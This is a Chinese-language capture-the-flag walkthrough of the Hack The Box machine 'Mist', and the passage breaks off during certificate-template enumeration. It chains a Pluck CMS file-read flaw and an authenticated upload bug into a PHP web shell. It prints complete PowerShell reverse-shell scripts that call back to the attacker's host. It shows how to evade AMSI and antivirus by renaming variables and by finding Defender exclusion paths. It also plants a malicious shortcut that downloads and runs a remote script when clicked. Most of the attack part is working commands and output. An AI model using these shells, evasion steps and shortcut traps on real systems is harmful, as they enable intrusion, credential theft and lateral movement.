Mist
1. 信息收集
1.1. 端口扫描(发现虚拟机)
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# nmap 10.10.11.17 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 03:04 EDT
Nmap scan report for 10.10.11.17
Host is up (0.11s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 13.69 seconds
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# nmap 10.10.11.17 -p 80 -sCV -vv
Nmap scan report for 10.10.11.17
Host is up, received echo-reply ttl 127 (0.071s latency).
Scanned at 2025-06-02 03:14:07 EDT for 12s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 126 Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
|_http-generator: pluck 4.7.18
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:14
Completed NSE at 03:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:14
Completed NSE at 03:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:14
Completed NSE at 03:14, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.12 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (72B)
这里发现只有一个80端口开放,而且有一点是比较奇怪的TTL的值为126,
关于TTL
windows默认的ttl是128,并且每一跳减一。
我们打靶机时会发现,通常windows的ttl是127,那是因为这是一个虚拟机,我们错过了128那一跳。
这里的ttl是126,说明这是一个虚拟机,因为我们错过了ttl 127这一跳
如果我们直接ping这个IP,你会发现ttl是 127,但是80端口是126,这说明网页服务是放在虚拟机上的。 我们应该可以通过这个虚拟机枚举出其他机器
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# ping 10.10.11.17
PING 10.10.11.17 (10.10.11.17) 56(84) bytes of data.
64 bytes from 10.10.11.17: icmp_seq=2 ttl=127 time=73.8 ms
64 bytes from 10.10.11.17: icmp_seq=3 ttl=127 time=72.0 ms
2. pluck 4.7.18 组合拳RCE
这里会用到两个CVE
首先我们通过nmap得知了pluck的版本是4.7.18
2.1. LFI
直接在github上面可以找到相应的后台RCE漏洞,这里还需要一个LFI的漏洞帮我们获取到后台账号密码
参考 CVE-2024-9405
http://10.10.11.17//data/settings/modules/albums/
这个路径可以看到网站的部分源文件,但是并不可以直接读取。
我们可以通过 http://192.168.174.140/data/modules/albums/albums_getimage.php?image=【文件】 来读取
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# curl http://10.10.11.17/data/modules/albums/albums_getimage.php?image=mist.php
<?php
$album_name = 'Mist';
?>30
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# curl http://10.10.11.17/data/modules/albums/albums_getimage.php?image=admin_backup.php
<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>146
判断这大概率是一个sha512
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# hash-identifier c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] SHA-512
[+] Whirlpool
Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
--------------------------------------------------
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# echo -n 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e' |wc -c
128 #128位也是sha512的特征之一
2.2. hashcrack
得到密码
lexypoo97
2.3. 后台 RCE
GitHub - Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC: A Proof of Concept for CVE-2023-50564 vulnerability in Pluck CMS version 4.7.18
这里可以直接用他的POC,也可以手动。
大致就是上传一个带php后门的压缩包,然后安装模组选择这个压缩包,这样就会上传后门上去了
创建后门,这里推荐使用这个phpshell https://github.com/flozz/p0wny-shell
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# mkdir shell
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# mv shell.php ./shell
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# zip -r shell.zip ./shell
adding: shell/ (stored 0%)
adding: shell/shell.php (stored 0%
然后访问 http://10.10.11.17/data/modules/shell/p0wnyshell.php
但是这里会每3分钟就清空上传文件,所以我们需要赶紧弹一个shell
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# cat rev.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.84',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
然后我们开启监听,使用webshell下载我们的ps1脚本后门,然后运行,这样可以看到我们是否运行成功
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
IEX (New-Object Net.WebClient).downloadString('http://10.10.14.84/rev.ps1')
svc_web@MS01:C:\xampp\htdocs\data\modules\shell# powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.84/rev1.ps1')
IEX : At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient('10.10.14.84',1234) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software. #这里提示我们被杀掉了
At line:1 char:1
+ IEX (New-Object Net.WebClient).downloadString('http://10.10.14.84/rev ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
2.4. Bypass AMSI
AMSI 是 Windows 系统中的一项技术,旨在保护 Windows 免受恶意 PowerShell(以及其他攻击)的侵害,大概率是他阻止了我们的powershell加载。
绕过AMSI可以通过混淆变量进行绕过
#可以在vim界面通过 :%s/xxxx/xxxx/g 进行替换
#原来的
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.84',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#替换后的
$c = New-Object Net.Sockets.TCPClient('10.10.14.84',1234);$s = $c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$ssb = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($ssb,0,$ssb.Length);$s.Flush()};$c.Close()
这里再次执行命令是需要换一个名字,比如我刚刚下载 rev.ps1 被杀掉了。 这里就需要改个名字,不然即使你的这个变量修改了,还是可能会被杀掉。
svc_web@MS01:C:\xampp\htdocs\data\modules\shell# powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.84/rev1.ps1')
执行成功后会把 rev1.ps1 下载到内存中,然后 IEX (Invoke-Expression) 会立即执行这个下载到内存中的ps1脚本。
一切顺利的话,你可以获取到一个shell。
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# rlwrap -cAr nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.84] from (UNKNOWN) [10.10.11.17] 60396
PS C:\xampp\htdocs\data\modules\shell> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.100.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.100.100
PS C:\xampp\htdocs\data\modules\shell> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
这里可以发现我们是一个192的网卡,这也可以说明我们是一个虚拟机。
然后检测一下是否有什么杀软啥的
PS C:\xampp\htdocs\data\modules\shell> tasklist /svc
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
Registry 76 N/A
smss.exe 336 N/A
csrss.exe 452 N/A
csrss.exe 520 N/A
wininit.exe 564 N/A
winlogon.exe 572 N/A
services.exe 636 N/A
lsass.exe 648 KeyIso, Netlogon, SamSs
svchost.exe 744 BrokerInfrastructure, DcomLaunch, LSM,
PlugPlay, Power, SystemEventsBroker
fontdrvhost.exe 768 N/A
fontdrvhost.exe 776 N/A
svchost.exe 852 RpcEptMapper, RpcSs
LogonUI.exe 932 N/A
dwm.exe 944 N/A
svchost.exe 988 DsmSvc, gpsvc, IKEEXT, iphlpsvc, ProfSvc,
Schedule, SENS, SessionEnv,
ShellHWDetection, UserManager, UsoSvc,
Winmgmt, WpnService, wuauserv
svchost.exe 996 TermService
svchost.exe 392 Dhcp, EventLog, lmhosts, TimeBrokerSvc,
vmictimesync, WinHttpAutoProxySvc
svchost.exe 440 CDPSvc, DispBrokerDesktopSvc, EventSystem,
FontCache, netprofm, nsi, SstpSvc
svchost.exe 704 W32Time
svchost.exe 700 DsSvc, NcbService, PcaSvc, StorSvc,
SysMain, TrkWks, UALSVC, UmRdpService,
vmicguestinterface, vmickvpexchange,
vmicshutdown, vmicvss
svchost.exe 800 CoreMessagingRegistrar, DPS
svchost.exe 1044 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, tapisrv, WinRM
svchost.exe 1112 vmicheartbeat
VSSVC.exe 1324 VSS
svchost.exe 1364 BFE, mpssvc
svchost.exe 1496 Wcmsvc
svchost.exe 1792 CertPropSvc, RasMan
svchost.exe 1060 DiagTrack
svchost.exe 920 LanmanServer
MsMpEng.exe 1832 WinDefend
svchost.exe 2340 PolicyAgent
AggregatorHost.exe 2516 N/A
httpd.exe 2536 ApacheHTTPServer
httpd.exe 2204 N/A
NisSrv.exe 3740 WdNisSvc
MicrosoftEdgeUpdate.exe 3856 N/A
msdtc.exe 580 MSDTC
WmiPrvSE.exe 1888 N/A
MsMpEng.exe:是 Windows Defender (或旧的 Microsoft Security Essentials) 的核心进程,负责扫描和保护你的电脑免受病毒和恶意软件侵害。NisSrv.exe:是 Windows Defender 的一个服务,负责实时监控网络流量,以抵御网络攻击。
2.5. 寻找杀软白名单目录
对于杀软的绕过可以寻找白名单目录,可以根据这篇文章去寻找
Peeking Behind the Curtain: Finding Defender’s Exclusions – Security Friends' Research Blog
此文章寻找目录的原理是通过事件日志来进行枚举
PS C:\xampp\htdocs\files> Get-WinEvent -LogName "Microsoft-Windows-Windows Defender/Operational" -FilterXPath "*[System[(EventID=5007)]]" | Where-Object { $_.Message -like "*Exclusions\Paths*" } | Select-Object -Property TimeCreated, Id, Message | Format-List
TimeCreated : 2/25/2024 5:36:45 AM
Id : 5007
Message : Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review
the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\xampp\htdocs = 0x0 #这里就找到了一个白名单目录 C:\xampp\htdocs
3. 域
3.1. malicious lnk
PS C:\users> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/2/2025 1:10 AM Administrator
d----- 2/20/2024 6:02 AM Administrator.MIST
d----- 6/2/2025 1:10 AM Brandon.Keywarp
d-r--- 2/20/2024 5:44 AM Public
d----- 2/20/2024 9:39 AM Sharon.Mullard
d----- 6/2/2025 1:09 AM svcweb
PS C:\users> net users
User accounts for \\MS01
Administrator DefaultAccount Guest
svcweb WDAGUtilityAccount
The command completed successfully.
PS C:\users> tree . /f
Folder PATH listing
Volume serial number is 0000013F 560D:8100
C:\USERS
+---Administrator
+---Administrator.MIST
+---Brandon.Keywarp
+---Public
? +---Documents
? +---Downloads
? +---Music
? +---Pictures
? +---Videos
+---Sharon.Mullard
+---svc_web
+---Desktop
+---Documents
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
+---Videos
可以看到这个机器上是有好几个用户的,我们现在是 ms01\svc_web 用户,且只能访问到自己目录和 public 目录
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2024 1:50 AM Common Applications
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 2/20/2024 5:44 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 2/21/2024 12:37 PM Users
d----- 3/26/2024 12:02 PM Windows
d----- 3/10/2024 3:21 AM xampp
PS C:\Common Applications> dir
Directory: C:\Common Applications
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2021 1:15 AM 1118 Calculator.lnk
-a---- 5/7/2021 3:14 PM 1175 Notepad.lnk
-a---- 5/7/2021 3:15 PM 1171 Wordpad.lnk
查看根目录,可以发现一个不太寻常的目录 Common Applications ,且这个目录下面全是一些 .lnk 文件
PS C:\Common Applications> net view \\ms01
Shared resources at \\ms01
Share name Type Used as Comment
-------------------------------------------------------------------------------
Common Applications Disk
The command completed successfully.
而且这个目录还被当做了SMB共享目录。 猜测可能会有机器人点击这个目录下的快捷方式,我们创建一个恶意的Lnk,然后替换此目录的Lnk文件。
参考:Phishing: OLE + LNK | Red Team Notes
或者用这个工具 GitHub - Plazmaz/LNKUp: Generates malicious LNK file payloads for data exfiltration
PS C:\Common Applications> $WScriptShell = New-Object -ComObject WScript.Shell
PS C:\Common Applications> $Shortcut = $WScriptShell.CreateShortcut("C:\Common Applications\Wordpad.lnk")
PS C:\Common Applications> $Shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS C:\Common Applications> $Shortcut.Arguments = "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.84/rev2.ps1')"
PS C:\Common Applications> $Shortcut.Save()
#rev2.ps1's content
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# cat rev2.ps1
$c = New-Object Net.Sockets.TCPClient('10.10.14.84',4455);$s = $c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$ssb = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($ssb,0,$ssb.Length);$s.Flush()};$c.Close()
http://10.10.14.84/rev2.ps1 中的内容就是反弹shell的脚本。
then wait for get a reverse shell
success to get a reverse shell
3.2. bloodhound
现在我们获取的域用户 mist\brandon.keywarp 的权限
上传sharphound.exe 进行域信息收集,在此之前我建议是用 Stowaway 作为一个shell工具,可以既可以搭建代理,还可以用于上传下载文件
curl http://10.10.14.84/SharpHound.exe -o sharphound.exe
curl http://10.10.14.84/windows_x64_agent.exe -o agent.exe
#收集
PS C:\xampp\htdocs\files> .\sharphound.exe -c all
#连接代理
admin -l 2233
agent.exe -c 10.10.14.84:2233
#下文件
(node 0) >> download 20250602075224_BloodHound.zip 20250602075224_BloodHound.zip
[*] File transmitting, please wait...
36.11 KiB / 36.11 KiB [------------------------------------------------------------------------------------------------------------------------------------------------------------] 100.00% 118.51 KiB p/s 1s
这里发现所有域用户组的成员都可以通过 Mist-DC01-CA 来注册这几个模版,占时就没发现其他的了
然后我们把hsots配置了
192.168.100.101 ms01.mist.htb ms01
192.168.100.100 dc01.mist.htb mist.htb dc01
3.3. Brandon.Keywrap NTLM
为了我们后续方便操作,这里先获取到 Brandon.Keywrap 用户的NTLM hash会比较好
过程:
利用stowaway可以很方便的上传对应的文件
利用 Certify.exe find /enrollable 获取可用的模版与CA信息
Certify.exe find /enrollable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ __| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mist,DC=htb'
[*] Listing info about the Enterprise CA 'mist-DC01-CA'
Enterprise CA Name : mist-DC01-CA
DNS Hostname : DC01.mist.htb
FullName : DC01.mist.htb\mist-DC01-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=mist-DC01-CA, DC=mist, DC=htb
Cert Thumbprint : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
Cert Serial : 3BF0F0DDF3306D8E463B218B7DB190F0
Cert Start Date : 2/15/2024 7:07:23 AM
Cert End Date : 2/15/2123 7:17:23 AM
Cert Chain : CN=mist-DC01-CA,DC=mist,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
Allow ManageCA, ManageCertificates MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Enrollment Agent Restrictions : None
[*] Available Certificates Templates :
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Domain Users S-1-5-21-1045809509-3006658589-2426055941-513
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Domain Users S-1-5-21-1045809509-3006658589-2426055941-513
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : File Recovery
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Domain Computers S-1-5-21-1045809509-3006658589-2426055941-515
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 75 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Domain Controllers S-1-5-21-1045809509-3006658589-2426055941-516
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
MIST\Enterprise Read-only Domain ControllersS-1-5-21-1045809509-3006658589-2426055941-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
